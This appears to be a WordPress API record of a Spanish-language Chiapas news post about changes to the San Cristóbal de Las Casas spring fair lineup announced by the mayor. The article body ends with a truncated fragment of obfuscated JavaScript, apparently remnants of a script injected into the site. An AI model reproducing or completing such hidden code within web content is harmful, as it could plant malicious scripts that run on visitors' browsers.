{"id":21130,"date":"2025-03-28T03:45:09","date_gmt":"2025-03-28T03:45:09","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21130"},"modified":"2025-03-28T03:45:09","modified_gmt":"2025-03-28T03:45:09","slug":"anuncia-fabiola-ricci-cambios-en-la-cartelera-de-la-feria-de-la-primavera-y-de-la-paz-2025","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21130","title":{"rendered":"Anuncia Fabiola Ricci cambios en la cartelera de la Feria de la Primavera y de La Paz 2025"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"668\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0028-668x1024.jpg\" alt=\"\" class=\"wp-image-21131\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0028-668x1024.jpg 668w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0028-196x300.jpg 196w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0028-768x1178.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0028-1001x1536.jpg 1001w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0028.jpg 1043w\" sizes=\"auto, (max-width: 668px) 100vw, 668px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 27 de marzo de 2025 \u2013 La presidenta municipal de San Crist\u00f3bal de Las Casas, Mtra. Fabiola Ricci Diestel, anunci\u00f3 la actualizaci\u00f3n de la cartelera oficial de la Feria de la Primavera y de la Paz, reafirmando que la voz del pueblo es la base de cada decisi\u00f3n tomada por su administraci\u00f3n.<\/p>\n\n\n\n<p>Durante el anuncio, dio la bienvenida a la reconocida artista Maribel Guardia y al cantautor chiapaneco Armando Narv\u00e1ez, quienes ser\u00e1n parte del elenco de esta celebraci\u00f3n tradicional.<\/p>\n\n\n\n<p>Ricci Diestel destac\u00f3 que la decisi\u00f3n se basa en \u201cmantener la feria como un espacio de paz y alegr\u00eda para la ciudadan\u00eda y Garantizar la participaci\u00f3n de las mujeres en cada proyecto y decisi\u00f3n del gobierno municipal\u201d.<\/p>\n\n\n\n<p>Finalmente, reiter\u00f3 el compromiso de su administraci\u00f3n con la ciudadan\u00eda, asegurando que su gobierno \u201ctrabaja con el pueblo y para el pueblo\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. San Crist\u00f3bal de Las Casas, 27 de marzo de 2025 \u2013 La presidenta municipal de San Crist\u00f3bal de Las Casas, Mtra. Fabiola Ricci Diestel, anunci\u00f3 la actualizaci\u00f3n de la cartelera oficial de la Feria de la Primavera y de la Paz, reafirmando que la voz del pueblo es la base de cada decisi\u00f3n tomada &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21131,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-21130","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21130","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21130"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21130\/revisions"}],"predecessor-version":[{"id":21132,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21130\/revisions\/21132"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21131"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21130"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21130"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21130"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}